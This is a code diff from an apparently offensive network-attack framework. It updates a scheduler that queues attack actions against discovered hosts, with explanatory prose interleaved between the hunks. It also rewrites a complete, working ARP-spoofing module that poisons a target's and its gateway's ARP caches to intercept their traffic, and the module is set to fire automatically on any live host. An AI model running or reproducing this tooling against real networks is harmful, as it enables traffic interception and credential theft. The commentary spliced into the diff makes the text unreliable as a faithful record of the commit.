ai_conf = metadata.get("ai_confidence")
ai_thr = metadata.get("ai_threshold")
scope = str(metadata.get("decision_scope", "unknown"))
conf_txt = f"{float(ai_conf):.2f}" if isinstance(ai_conf, (int, float)) else "n/a"
thr_txt = f"{float(ai_thr):.2f}" if isinstance(ai_thr, (int, float)) else "n/a"
model_loaded = bool(metadata.get("ai_model_loaded", False))
port_txt = "None" if target_port is None else str(target_port)
svc_txt = target_service if target_service else "None"
logger.info(
f"[QUEUE_DECISION] scope={scope} action={action_name} mac={mac} port={port_txt} service={svc_txt} "
f"decision={decision} origin={origin} ai_method={ai_method} conf={conf_txt} thr={thr_txt} "
f"model_loaded={model_loaded} reason={ai_reason}"
)
def _refresh_cache_if_needed(self):
"""Refresh action definitions cache if expired or source flipped."""
@@ -160,6 +459,9 @@ class ActionScheduler:
# Build cache (expect same action schema: b_class, b_trigger, b_action, etc.)
self._action_definitions = {a["b_class"]: a for a in actions}
# Runtime truth: orchestrator loads from `actions`, so align b_enabled to it
# even when scheduler uses `actions_studio` as source.
self._overlay_runtime_enabled_flags()
logger.info(f"Refreshed action cache from '{source}': {len(self._action_definitions)} actions")
except AttributeError as e:
@@ -179,6 +481,67 @@ class ActionScheduler:
except Exception as e:
logger.error(f"Failed to refresh action cache: {e}")
def _is_action_enabled(self, action_def: Dict[str, Any]) -> bool:
"""Parse b_enabled robustly across int/bool/string/null values."""
raw = action_def.get("b_enabled", 1)
if raw is None:
return True
if isinstance(raw, bool):
return raw
if isinstance(raw, (int, float)):
return int(raw) == 1
s = str(raw).strip().lower()
if s in {"1", "true", "yes", "on"}:
return True
if s in {"0", "false", "no", "off"}:
return False
try:
return int(float(s)) == 1
except Exception:
# Conservative default: keep action enabled when value is malformed.
return True
def _overlay_runtime_enabled_flags(self):
"""
Override cached `b_enabled` with runtime `actions` table values.
This keeps scheduler decisions aligned with orchestrator loaded actions.
"""
try:
runtime_rows = self.db.list_actions()
runtime_map = {r.get("b_class"): r.get("b_enabled", 1) for r in runtime_rows}
for action_name, action_def in self._action_definitions.items():
if action_name in runtime_map:
action_def["b_enabled"] = runtime_map[action_name]
except Exception as e:
logger.warning(f"Could not overlay runtime b_enabled flags: {e}")
def _cancel_queued_disabled_actions(self):
"""Cancel pending/scheduled queue entries for currently disabled actions."""
try:
disabled = [
name for name, definition in self._action_definitions.items()
if not self._is_action_enabled(definition)
]
if not disabled:
return
placeholders = ",".join("?" for _ in disabled)
affected = self.db.execute(
f"""
UPDATE action_queue
SET status='cancelled',
completed_at=CURRENT_TIMESTAMP,
error_message=COALESCE(error_message, 'disabled_by_config')
WHERE status IN ('scheduled','pending')
AND action_name IN ({placeholders})
""",
tuple(disabled),
)
if affected:
logger.info(f"Cancelled {affected} queued action(s) because b_enabled=0")
except Exception as e:
logger.error(f"Failed to cancel queued disabled actions: {e}")
# ------------------------------------------------------------------ helpers
@@ -248,7 +611,7 @@ class ActionScheduler:
for action in self._action_definitions.values():
if (action.get("b_action") or "normal") != "global":
continue
if int(action.get("b_enabled", 1) or 1) != 1:
if not self._is_action_enabled(action):
continue
trigger = (action.get("b_trigger") or "").strip()
@@ -275,7 +638,7 @@ class ActionScheduler:
for action in self._action_definitions.values():
if (action.get("b_action") or "normal") == "global":
continue
if int(action.get("b_enabled", 1) or 1) != 1:
if not self._is_action_enabled(action):
continue
trigger = (action.get("b_trigger") or "").strip()
@@ -309,6 +672,19 @@ class ActionScheduler:
next_run = _utcnow() if not last else (last + timedelta(seconds=interval))
scheduled_for = _db_ts(next_run)
metadata = {
"interval": interval,
"is_global": True,
"decision_method": "heuristic",
"decision_origin": "heuristic",
}
self._annotate_decision_metadata(
metadata=metadata,
action_name=action_name,
context={"mac": mac, "hostname": "Bjorn-C2", "ports": []},
decision_scope="scheduled_global",
)
inserted = self.db.ensure_scheduled_occurrence(
action_name=action_name,
next_run_at=scheduled_for,
@@ -317,7 +693,7 @@ class ActionScheduler:
priority=int(action_def.get("b_priority", 40) or 40),
trigger="scheduler",
tags=action_def.get("b_tags", []),
metadata={"interval": interval, "is_global": True},
metadata=metadata,
max_retries=int(action_def.get("b_max_retries", 3) or 3),
)
if inserted:
@@ -354,6 +730,23 @@ class ActionScheduler:
next_run = _utcnow() if not last else (last + timedelta(seconds=interval))
scheduled_for = _db_ts(next_run)
metadata = {
"interval": interval,
"is_global": False,
"decision_method": "heuristic",
"decision_origin": "heuristic",
}
self._annotate_decision_metadata(
metadata=metadata,
action_name=action_name,
context={
"mac": mac,
"hostname": (host.get("hostnames") or "").split(";")[0],
"ports": [int(p) for p in (host.get("ports") or "").split(";") if p.isdigit()],
},
decision_scope="scheduled_host",
)
inserted = self.db.ensure_scheduled_occurrence(
action_name=action_name,
next_run_at=scheduled_for,
@@ -362,7 +755,7 @@ class ActionScheduler:
priority=int(action_def.get("b_priority", 40) or 40),
trigger="scheduler",
tags=action_def.get("b_tags", []),
metadata={"interval": interval, "is_global": False},
metadata=metadata,
max_retries=int(action_def.get("b_max_retries", 3) or 3),
)
if inserted:
@@ -382,7 +775,7 @@ class ActionScheduler:
for action in self._action_definitions.values():
if (action.get("b_action") or "normal") != "global":
continue
if int(action.get("b_enabled", 1)) != 1:
if not self._is_action_enabled(action):
continue
trigger = (action.get("b_trigger") or "").strip()
@@ -409,14 +802,13 @@ class ActionScheduler:
continue
# Queue the action
self._queue_global_action(action)
self._last_global_runs[action_name] = time.time()
logger.info(f"Queued global action {action_name}")
if self._queue_global_action(action):
self._last_global_runs[action_name] = time.time()
except Exception as e:
logger.error(f"Error evaluating global actions: {e}")
def _queue_global_action(self, action_def: Dict[str, Any]):
def _queue_global_action(self, action_def: Dict[str, Any]) -> bool:
"""Queue a global action for execution (idempotent insert)."""
action_name = action_def["b_class"]
mac = self.ctrl_mac
@@ -429,12 +821,30 @@ class ActionScheduler:
"requirements": action_def.get("b_requires", ""),
"timeout": timeout,
"is_global": True,
"decision_method": "heuristic",
"decision_origin": "heuristic",
}
# Global context (controller itself)
context = {
"mac": mac,
"hostname": "Bjorn-C2",
"ports": [] # Global actions usually don't target specific ports on controller
}
self._annotate_decision_metadata(
metadata=metadata,
action_name=action_name,
context=context,
decision_scope="queue_global",
)
ai_conf = metadata.get("ai_confidence")
if isinstance(ai_conf, (int, float)) and metadata.get("decision_origin") == "ai_confirmed":
action_def["b_priority"] = int(action_def.get("b_priority", 50) or 50) + int(20 * float(ai_conf))
try:
self._ensure_host_exists(mac)
# Guard with NOT EXISTS to avoid races
self.db.execute(
affected = self.db.execute(
"""
INSERT INTO action_queue (
action_name, mac_address, ip, port, hostname, service,
@@ -463,8 +873,13 @@ class ActionScheduler:
mac,
),
)
if affected and affected > 0:
self._log_queue_decision(action_name=action_name, mac=mac, metadata=metadata)
return True
return False
except Exception as e:
logger.error(f"Failed to queue global action {action_name}: {e}")
return False
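`_queue_global_action` now returns `True` only when the guarded INSERT actually affected a row, which is what lets the caller update `_last_global_runs` correctly. A minimal, self-contained sketch of the idempotent `INSERT ... SELECT ... WHERE NOT EXISTS` pattern (table and columns simplified from the real `action_queue` schema):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute(
    "CREATE TABLE action_queue (action_name TEXT, mac_address TEXT, status TEXT)"
)

def queue_once(conn, action_name, mac):
    """Insert a pending row only if no active duplicate exists.

    Returns True when a row was actually inserted, mirroring the
    `affected and affected > 0` check in the diff above.
    """
    cur = conn.execute(
        """
        INSERT INTO action_queue (action_name, mac_address, status)
        SELECT ?, ?, 'pending'
        WHERE NOT EXISTS (
            SELECT 1 FROM action_queue
            WHERE action_name = ? AND mac_address = ?
              AND status IN ('pending', 'running')
        )
        """,
        (action_name, mac, action_name, mac),
    )
    return cur.rowcount > 0

print(queue_once(conn, "NetworkScanner", "aa:bb"))  # True  (first insert)
print(queue_once(conn, "NetworkScanner", "aa:bb"))  # False (duplicate skipped)
```

The `NOT EXISTS` guard in the statement itself (rather than a separate SELECT) keeps the check-and-insert atomic, so concurrent schedulers cannot race each other into duplicates.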
# ------------------------------------------------------------- host path
@@ -480,7 +895,7 @@ class ActionScheduler:
continue
# Skip disabled actions
if not int(action_def.get("b_enabled", 1)):
if not self._is_action_enabled(action_def):
continue
trigger = (action_def.get("b_trigger") or "").strip()
@@ -509,7 +924,6 @@ class ActionScheduler:
# Queue the action
self._queue_action(host, action_def, target_port, target_service)
logger.info(f"Queued {action_name} for {mac} (port={target_port}, service={target_service})")
def _resolve_target_port_service(
self, mac: str, host: Dict[str, Any], action_def: Dict[str, Any]
@@ -585,6 +999,32 @@ class ActionScheduler:
"""
self_port = 0 if target_port is None else int(target_port)
# Circuit breaker check (ORCH-01)
if self.db.is_circuit_open(action_name, mac):
logger.debug(f"Circuit breaker open for {action_name}/{mac}, skipping")
return False
# Global concurrency limit check (ORCH-02)
running_count = self.db.count_running_actions()
max_concurrent = int(getattr(self.shared_data, 'semaphore_slots', 5))
if running_count >= max_concurrent:
logger.debug(f"Concurrency limit reached ({running_count}/{max_concurrent}), skipping {action_name}")
return False
# Per-action concurrency limit (ORCH-02)
requires_raw = action_def.get("b_requires", "")
if requires_raw:
try:
req_obj = json.loads(requires_raw) if isinstance(requires_raw, str) else requires_raw
if isinstance(req_obj, dict) and "max_concurrent" in req_obj:
max_per_action = int(req_obj["max_concurrent"])
running_for_action = self.db.count_running_actions(action_name=action_name)
if running_for_action >= max_per_action:
logger.debug(f"Per-action concurrency limit for {action_name} ({running_for_action}/{max_per_action})")
return False
except (json.JSONDecodeError, TypeError, ValueError):
pass
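The per-action limit (ORCH-02) is read from the action's `b_requires` field, which may be a JSON string, an already-decoded dict, or empty. The parse in isolation, as a hedged sketch:

```python
import json

def per_action_cap(requires_raw, default=None):
    """Extract an optional max_concurrent limit from a b_requires value.

    Tolerates a JSON string, an already-decoded dict, or anything falsy;
    malformed input simply yields the default (no cap), matching the
    swallow-and-continue behaviour in the diff.
    """
    if not requires_raw:
        return default
    try:
        obj = json.loads(requires_raw) if isinstance(requires_raw, str) else requires_raw
        if isinstance(obj, dict) and "max_concurrent" in obj:
            return int(obj["max_concurrent"])
    except (json.JSONDecodeError, TypeError, ValueError):
        pass
    return default

print(per_action_cap('{"action":"NetworkScanner","max_concurrent":2}'))  # 2
print(per_action_cap('{"action":"NetworkScanner"}'))                     # None
print(per_action_cap("not json"))                                        # None
```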
# 0) Duplicate protection (active)
existing = self.db.query(
"""
@@ -640,7 +1080,7 @@ class ActionScheduler:
def _queue_action(
self, host: Dict[str, Any], action_def: Dict[str, Any], target_port: Optional[int], target_service: Optional[str]
):
) -> bool:
"""Queue action for execution (idempotent insert with NOT EXISTS guard)."""
action_name = action_def["b_class"]
mac = host["mac_address"]
@@ -653,11 +1093,29 @@ class ActionScheduler:
"requirements": action_def.get("b_requires", ""),
"is_global": False,
"timeout": timeout,
"decision_method": "heuristic",
"decision_origin": "heuristic",
"ports_snapshot": host.get("ports") or "",
}
context = {
"mac": mac,
"hostname": (host.get("hostnames") or "").split(";")[0],
"ports": [int(p) for p in (host.get("ports") or "").split(";") if p.isdigit()],
}
self._annotate_decision_metadata(
metadata=metadata,
action_name=action_name,
context=context,
decision_scope="queue_host",
)
ai_conf = metadata.get("ai_confidence")
if isinstance(ai_conf, (int, float)) and metadata.get("decision_origin") == "ai_confirmed":
# Apply small priority boost only when AI confirmed this exact action.
action_def["b_priority"] = int(action_def.get("b_priority", 50) or 50) + int(20 * float(ai_conf))
try:
self.db.execute(
affected = self.db.execute(
"""
INSERT INTO action_queue (
action_name, mac_address, ip, port, hostname, service,
@@ -690,8 +1148,19 @@ class ActionScheduler:
self_port,
),
)
if affected and affected > 0:
self._log_queue_decision(
action_name=action_name,
mac=mac,
metadata=metadata,
target_port=target_port,
target_service=target_service,
)
return True
return False
except Exception as e:
logger.error(f"Failed to queue {action_name} for {mac}: {e}")
return False
# ------------------------------------------------------------- last times
@@ -708,7 +1177,11 @@ class ActionScheduler:
)
if row and row[0].get("completed_at"):
try:
return datetime.fromisoformat(row[0]["completed_at"])
val = row[0]["completed_at"]
if isinstance(val, str):
return datetime.fromisoformat(val)
elif isinstance(val, datetime):
return val
except Exception:
return None
return None
@@ -726,7 +1199,11 @@ class ActionScheduler:
)
if row and row[0].get("completed_at"):
try:
return datetime.fromisoformat(row[0]["completed_at"])
val = row[0]["completed_at"]
if isinstance(val, str):
return datetime.fromisoformat(val)
elif isinstance(val, datetime):
return val
except Exception:
return None
return None
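Both "last run" helpers are hardened the same way: `completed_at` may come back from the DB layer as an ISO-8601 string or as an already-parsed `datetime` (some drivers convert timestamp columns). The shared logic, extracted as a sketch:

```python
from datetime import datetime

def parse_completed_at(val):
    """Return a datetime from a DB value that may be an ISO-8601 string,
    an already-parsed datetime, or something unusable (-> None)."""
    if isinstance(val, str):
        try:
            return datetime.fromisoformat(val)
        except ValueError:
            return None
    if isinstance(val, datetime):
        return val
    return None

print(parse_completed_at("2026-03-16T21:54:31"))  # 2026-03-16 21:54:31
print(parse_completed_at(datetime(2026, 3, 16)))  # 2026-03-16 00:00:00
print(parse_completed_at(None))                   # None
```

Before this fix, passing a `datetime` straight into `datetime.fromisoformat` raised `TypeError`, which the bare `except Exception` silently turned into "never ran", resetting the interval clock.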
@@ -840,19 +1317,7 @@ class ActionScheduler:
except Exception as e:
logger.error(f"Failed to cleanup queue: {e}")
def update_priorities(self):
"""Boost priority for actions waiting too long (anti-starvation)."""
try:
self.db.execute(
"""
UPDATE action_queue
SET priority = MIN(100, priority + 1)
WHERE status='pending'
AND julianday('now') - julianday(created_at) > 0.0417
"""
)
except Exception as e:
logger.error(f"Failed to update priorities: {e}")
# update_priorities is defined above (line ~166); this duplicate is removed.
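The surviving `update_priorities` uses `julianday('now') - julianday(created_at) > 0.0417`; 0.0417 julian days is 1/24 of a day, i.e. roughly one hour of queue wait before the anti-starvation boost kicks in. A runnable demonstration of the same SQL against a throwaway table:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE action_queue (priority INTEGER, status TEXT, created_at TEXT)")
# One fresh row and one that has been pending for two hours.
conn.execute("INSERT INTO action_queue VALUES (40, 'pending', datetime('now'))")
conn.execute("INSERT INTO action_queue VALUES (40, 'pending', datetime('now', '-2 hours'))")

# Only rows older than ~1 hour (0.0417 julian days) get the +1 boost,
# capped at 100 so a starving action cannot overflow the priority scale.
conn.execute(
    """
    UPDATE action_queue
    SET priority = MIN(100, priority + 1)
    WHERE status = 'pending'
      AND julianday('now') - julianday(created_at) > 0.0417
    """
)
print([r[0] for r in conn.execute("SELECT priority FROM action_queue ORDER BY rowid")])  # [40, 41]
```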
# =================================================================== helpers ==

(Binary image diffs omitted: 29 icon/screenshot assets re-encoded, with file sizes reduced substantially, e.g. 2.2 MiB → 21 KiB and 185 KiB → 20 KiB.)


View File

@@ -1,163 +1,330 @@
# ARP Spoofer: poisons the ARP cache of a target and its gateway.
# Saves settings (target, gateway, interface, delay) in `/home/bjorn/.settings_bjorn/arpspoofer_settings.json`.
# Automatically loads saved settings if arguments are not provided.
# -t, --target IP address of the target device (overrides saved value).
# -g, --gateway IP address of the gateway (overrides saved value).
# -i, --interface Network interface (default: primary or saved).
# -d, --delay Delay between ARP packets in seconds (default: 2 or saved).
# - First time: python arpspoofer.py -t TARGET -g GATEWAY -i INTERFACE -d DELAY
# - Subsequent: python arpspoofer.py (uses saved settings).
# - Update: Provide any argument to override saved values.
"""
arp_spoofer.py — ARP Cache Poisoning for Man-in-the-Middle positioning.
Ethical cybersecurity lab action for Bjorn framework.
Performs bidirectional ARP spoofing between a target host and the network
gateway. Restores ARP tables on completion or interruption.
SQL mode:
- Orchestrator provides (ip, port, row) for the target host.
- Gateway IP is auto-detected from system routing table or shared config.
- Results persisted to JSON output and logged for RL training.
- Fully integrated with EPD display (progress, status, comments).
"""
import os
import json
import time
import argparse
from scapy.all import ARP, send, sr1, conf
import logging
import json
import subprocess
import datetime
from typing import Dict, Optional, Tuple
from shared import SharedData
from logger import Logger
logger = Logger(name="arp_spoofer.py", level=logging.DEBUG)
# Silence scapy warnings
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
logging.getLogger("scapy").setLevel(logging.ERROR)
# ──────────────────────── Action Metadata ────────────────────────
b_class = "ARPSpoof"
b_module = "arp_spoofer"
b_status = "arp_spoof"
b_port = None
b_service = '[]'
b_trigger = "on_host_alive"
b_parent = None
b_action = "aggressive"
b_category = "network_attack"
b_name = "ARP Spoofer"
b_description = (
"Bidirectional ARP cache poisoning between target host and gateway for "
"MITM positioning. Detects gateway automatically, spoofs both directions, "
"and cleanly restores ARP tables on completion. Educational lab use only."
)
b_author = "Bjorn Team"
b_version = "2.0.0"
b_icon = "ARPSpoof.png"
b_requires = '{"action":"NetworkScanner","status":"success","scope":"global"}'
b_priority = 30
b_cooldown = 3600
b_rate_limit = "2/86400"
b_timeout = 300
b_max_retries = 1
b_stealth_level = 2
b_risk_level = "high"
b_enabled = 1
b_tags = ["mitm", "arp", "network", "layer2"]
b_args = {
"duration": {
"type": "slider", "label": "Duration (s)",
"min": 10, "max": 300, "step": 10, "default": 60,
"help": "How long to maintain the ARP poison (seconds)."
},
"interval": {
"type": "slider", "label": "Packet interval (s)",
"min": 1, "max": 10, "step": 1, "default": 2,
"help": "Delay between ARP poison packets."
},
}
b_examples = [
{"duration": 60, "interval": 2},
{"duration": 120, "interval": 1},
]
b_docs_url = "docs/actions/ARPSpoof.md"
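The `b_args` schema above declares slider bounds and defaults for the action's runtime parameters. The framework's actual argument plumbing is not shown in this diff (in `execute` the values surface as `shared_data.arp_spoof_duration` etc.); the helper below is a hypothetical sketch of how overrides could be resolved and clamped against such a schema:

```python
def resolve_args(b_args: dict, overrides: dict) -> dict:
    """Resolve runtime values for a b_args-style schema: prefer the
    override when present, clamp numerics to [min, max], else fall back
    to the declared default. Illustrative only; the framework's real
    resolver may differ."""
    resolved = {}
    for name, spec in b_args.items():
        val = overrides.get(name, spec.get("default"))
        lo, hi = spec.get("min"), spec.get("max")
        if isinstance(val, (int, float)):
            if lo is not None:
                val = max(lo, val)
            if hi is not None:
                val = min(hi, val)
        resolved[name] = val
    return resolved

schema = {
    "duration": {"type": "slider", "min": 10, "max": 300, "default": 60},
    "interval": {"type": "slider", "min": 1, "max": 10, "default": 2},
}
print(resolve_args(schema, {"duration": 9999}))  # {'duration': 300, 'interval': 2}
```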
# ──────────────────────── Constants ──────────────────────────────
_DATA_DIR = os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), "data")
OUTPUT_DIR = os.path.join(_DATA_DIR, "output", "arp")
b_class = "ARPSpoof"
b_module = "arp_spoofer"
b_enabled = 0
# Folder and file for settings
SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
SETTINGS_FILE = os.path.join(SETTINGS_DIR, "arpspoofer_settings.json")
class ARPSpoof:
def __init__(self, target_ip, gateway_ip, interface, delay):
self.target_ip = target_ip
self.gateway_ip = gateway_ip
self.interface = interface
self.delay = delay
conf.iface = self.interface # Set the interface
print(f"ARPSpoof initialized with target IP: {self.target_ip}, gateway IP: {self.gateway_ip}, interface: {self.interface}, delay: {self.delay}s")
"""ARP cache poisoning action integrated with Bjorn orchestrator."""
def get_mac(self, ip):
"""Gets the MAC address of a target IP by sending an ARP request."""
print(f"Retrieving MAC address for IP: {ip}")
def __init__(self, shared_data: SharedData):
self.shared_data = shared_data
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
self._refresh_ip_identity_cache()
self._scapy_ok = False
self._check_scapy()
try:
arp_request = ARP(pdst=ip)
response = sr1(arp_request, timeout=2, verbose=False)
if response:
print(f"MAC address found for {ip}: {response.hwsrc}")
return response.hwsrc
else:
print(f"No ARP response received for IP {ip}")
return None
os.makedirs(OUTPUT_DIR, exist_ok=True)
except OSError:
pass
logger.info("ARPSpoof initialized")
def _check_scapy(self):
try:
from scapy.all import ARP, Ether, sendp, sr1 # noqa: F401
self._scapy_ok = True
except ImportError:
logger.error("scapy not available — ARPSpoof will not function")
self._scapy_ok = False
# ─────────────────── Identity Cache ──────────────────────
def _refresh_ip_identity_cache(self):
self._ip_to_identity.clear()
try:
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
print(f"Error retrieving MAC address for {ip}: {e}")
return None
logger.error(f"DB get_all_hosts failed: {e}")
rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hn = (r.get("hostnames") or "").split(";", 1)[0]
for ip_addr in [p.strip() for p in (r.get("ips") or "").split(";") if p.strip()]:
self._ip_to_identity[ip_addr] = (mac, hn)
def spoof(self, target_ip, spoof_ip):
"""Sends an ARP packet to spoof the target into believing the attacker's IP is the spoofed IP."""
print(f"Preparing ARP spoofing for target {target_ip}, pretending to be {spoof_ip}")
target_mac = self.get_mac(target_ip)
spoof_mac = self.get_mac(spoof_ip)
if not target_mac or not spoof_mac:
print(f"Cannot find MAC address for target {target_ip} or {spoof_ip}, spoofing aborted")
return
def _mac_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[0]
# ─────────────────── Gateway Detection ──────────────────
def _detect_gateway(self) -> Optional[str]:
"""Auto-detect the default gateway IP."""
gw = getattr(self.shared_data, "gateway_ip", None)
if gw and gw != "0.0.0.0":
return gw
try:
arp_response = ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip, hwsrc=spoof_mac)
send(arp_response, verbose=False)
print(f"Spoofed ARP packet sent to {target_ip} claiming to be {spoof_ip}")
result = subprocess.run(
["ip", "route", "show", "default"],
capture_output=True, text=True, timeout=5
)
if result.returncode == 0 and result.stdout.strip():
parts = result.stdout.strip().split("\n")[0].split()
idx = parts.index("via") if "via" in parts else -1
if idx >= 0 and idx + 1 < len(parts):
return parts[idx + 1]
except Exception as e:
print(f"Error sending ARP packet to {target_ip}: {e}")
def restore(self, target_ip, spoof_ip):
"""Sends an ARP packet to restore the legitimate IP/MAC mapping for the target and spoof IP."""
print(f"Restoring ARP association for {target_ip} using {spoof_ip}")
target_mac = self.get_mac(target_ip)
gateway_mac = self.get_mac(spoof_ip)
if not target_mac or not gateway_mac:
print(f"Cannot restore ARP, MAC addresses not found for {target_ip} or {spoof_ip}")
return
logger.debug(f"Gateway detection via ip route failed: {e}")
try:
arp_response = ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip, hwsrc=gateway_mac)
send(arp_response, verbose=False, count=5)
print(f"ARP association restored between {spoof_ip} and {target_mac}")
from scapy.all import conf as scapy_conf
gw = scapy_conf.route.route("0.0.0.0")[2]
if gw and gw != "0.0.0.0":
return gw
except Exception as e:
print(f"Error restoring ARP association for {target_ip}: {e}")
logger.debug(f"Gateway detection via scapy failed: {e}")
return None
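`_detect_gateway` shells out to `ip route show default` and scans the first line for the token after `via`. That parsing step can be exercised without a subprocess; a self-contained sketch:

```python
def parse_default_gateway(route_output: str):
    """Extract the gateway IP from `ip route show default` output,
    e.g. 'default via 192.168.1.1 dev eth0 proto dhcp metric 100'.
    Returns None for empty output or a via-less route (e.g. point-to-point)."""
    if not route_output.strip():
        return None
    parts = route_output.strip().split("\n")[0].split()
    if "via" in parts:
        idx = parts.index("via")
        if idx + 1 < len(parts):
            return parts[idx + 1]
    return None

print(parse_default_gateway("default via 192.168.1.1 dev eth0 proto dhcp"))  # 192.168.1.1
print(parse_default_gateway("default dev tun0 scope link"))                  # None
```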
def execute(self):
"""Executes the ARP spoofing attack."""
# ─────────────────── ARP Operations ──────────────────────
@staticmethod
def _get_mac_via_arp(ip: str, iface: str = None, timeout: float = 2.0) -> Optional[str]:
"""Resolve IP to MAC via ARP request."""
try:
print(f"Starting ARP Spoofing attack on target {self.target_ip} via gateway {self.gateway_ip}")
from scapy.all import ARP, sr1
kwargs = {"timeout": timeout, "verbose": False}
if iface:
kwargs["iface"] = iface
resp = sr1(ARP(pdst=ip), **kwargs)
if resp and hasattr(resp, "hwsrc"):
return resp.hwsrc
except Exception as e:
logger.debug(f"ARP resolution failed for {ip}: {e}")
return None
while True:
target_mac = self.get_mac(self.target_ip)
gateway_mac = self.get_mac(self.gateway_ip)
@staticmethod
def _send_arp_poison(target_ip, target_mac, spoof_ip, iface=None):
"""Send a single ARP poison packet (op=is-at)."""
try:
from scapy.all import ARP, Ether, sendp
pkt = Ether(dst=target_mac) / ARP(
op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip
)
kwargs = {"verbose": False}
if iface:
kwargs["iface"] = iface
sendp(pkt, **kwargs)
except Exception as e:
logger.error(f"ARP poison send failed to {target_ip}: {e}")
if not target_mac or not gateway_mac:
print(f"Error retrieving MAC addresses, stopping ARP Spoofing")
self.restore(self.target_ip, self.gateway_ip)
self.restore(self.gateway_ip, self.target_ip)
@staticmethod
def _send_arp_restore(target_ip, target_mac, real_ip, real_mac, iface=None):
"""Restore legitimate ARP mapping with multiple packets."""
try:
from scapy.all import ARP, Ether, sendp
pkt = Ether(dst=target_mac) / ARP(
op=2, pdst=target_ip, hwdst=target_mac,
psrc=real_ip, hwsrc=real_mac
)
kwargs = {"verbose": False, "count": 5}
if iface:
kwargs["iface"] = iface
sendp(pkt, **kwargs)
except Exception as e:
logger.error(f"ARP restore failed for {target_ip}: {e}")
# ─────────────────── Main Execute ────────────────────────
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
"""Execute bidirectional ARP spoofing against target host."""
self.shared_data.bjorn_orch_status = "ARPSpoof"
self.shared_data.bjorn_progress = "0%"
self.shared_data.comment_params = {"ip": ip}
if not self._scapy_ok:
logger.error("scapy unavailable, cannot perform ARP spoof")
return "failed"
target_mac = None
gateway_mac = None
gateway_ip = None
iface = None
try:
if self.shared_data.orchestrator_should_exit:
return "interrupted"
mac = row.get("MAC Address") or row.get("mac_address") or ""
hostname = row.get("Hostname") or row.get("hostname") or ""
# 1) Detect gateway
gateway_ip = self._detect_gateway()
if not gateway_ip:
logger.error(f"Cannot detect gateway for ARP spoof on {ip}")
return "failed"
if gateway_ip == ip:
logger.warning(f"Target {ip} IS the gateway — skipping")
return "failed"
logger.info(f"ARP Spoof: target={ip} gateway={gateway_ip}")
self.shared_data.log_milestone(b_class, "GatewayID", f"Poisoning {ip} <-> {gateway_ip}")
self.shared_data.comment_params = {"ip": ip, "gateway": gateway_ip}
self.shared_data.bjorn_progress = "10%"
# 2) Resolve MACs
iface = getattr(self.shared_data, "default_network_interface", None)
target_mac = self._get_mac_via_arp(ip, iface)
gateway_mac = self._get_mac_via_arp(gateway_ip, iface)
if not target_mac:
logger.error(f"Cannot resolve MAC for target {ip}")
return "failed"
if not gateway_mac:
logger.error(f"Cannot resolve MAC for gateway {gateway_ip}")
return "failed"
self.shared_data.bjorn_progress = "20%"
logger.info(f"Resolved — target_mac={target_mac}, gateway_mac={gateway_mac}")
self.shared_data.log_milestone(b_class, "PoisonActive", f"MACs resolved, starting spoof")
# 3) Spoofing loop
duration = int(getattr(self.shared_data, "arp_spoof_duration", 60))
interval = max(1, int(getattr(self.shared_data, "arp_spoof_interval", 2)))
packets_sent = 0
start_time = time.time()
while (time.time() - start_time) < duration:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit — stopping ARP spoof")
break
self._send_arp_poison(ip, target_mac, gateway_ip, iface)
self._send_arp_poison(gateway_ip, gateway_mac, ip, iface)
packets_sent += 2
print(f"Sending ARP packets to poison {self.target_ip} and {self.gateway_ip}")
self.spoof(self.target_ip, self.gateway_ip)
self.spoof(self.gateway_ip, self.target_ip)
elapsed = time.time() - start_time
pct = min(90, int(20 + (elapsed / max(duration, 1)) * 70))
self.shared_data.bjorn_progress = f"{pct}%"
if packets_sent % 20 == 0:
self.shared_data.log_milestone(b_class, "Status", f"Injected {packets_sent} poison pkts")
time.sleep(self.delay)
time.sleep(interval)
# 4) Restore ARP tables
self.shared_data.bjorn_progress = "95%"
logger.info("Restoring ARP tables...")
self.shared_data.log_milestone(b_class, "RestoreStart", f"Healing {ip} and {gateway_ip}")
self._send_arp_restore(ip, target_mac, gateway_ip, gateway_mac, iface)
self._send_arp_restore(gateway_ip, gateway_mac, ip, target_mac, iface)
# 5) Save results
elapsed_total = time.time() - start_time
result_data = {
"timestamp": datetime.datetime.now().isoformat(),
"target_ip": ip, "target_mac": target_mac,
"gateway_ip": gateway_ip, "gateway_mac": gateway_mac,
"duration_s": round(elapsed_total, 1),
"packets_sent": packets_sent,
"hostname": hostname, "mac_address": mac
}
try:
ts = datetime.datetime.now().strftime("%Y%m%d_%H%M%S")
out_file = os.path.join(OUTPUT_DIR, f"arp_spoof_{ip}_{ts}.json")
with open(out_file, "w") as f:
json.dump(result_data, f, indent=2)
except Exception as e:
logger.error(f"Failed to save results: {e}")
self.shared_data.bjorn_progress = "100%"
self.shared_data.log_milestone(b_class, "Complete", f"Restored tables after {packets_sent} pkts")
return "success"
except KeyboardInterrupt:
print("Attack interrupted. Restoring ARP tables.")
self.restore(self.target_ip, self.gateway_ip)
self.restore(self.gateway_ip, self.target_ip)
print("ARP Spoofing stopped and ARP tables restored.")
except Exception as e:
print(f"Unexpected error during ARP Spoofing attack: {e}")
logger.error(f"ARPSpoof failed for {ip}: {e}")
if target_mac and gateway_mac and gateway_ip:
try:
self._send_arp_restore(ip, target_mac, gateway_ip, gateway_mac, iface)
self._send_arp_restore(gateway_ip, gateway_mac, ip, target_mac, iface)
logger.info("Emergency ARP restore sent after error")
except Exception:
pass
return "failed"
finally:
self.shared_data.bjorn_progress = ""
def save_settings(target, gateway, interface, delay):
"""Saves the ARP spoofing settings to a JSON file."""
try:
os.makedirs(SETTINGS_DIR, exist_ok=True)
settings = {
"target": target,
"gateway": gateway,
"interface": interface,
"delay": delay
}
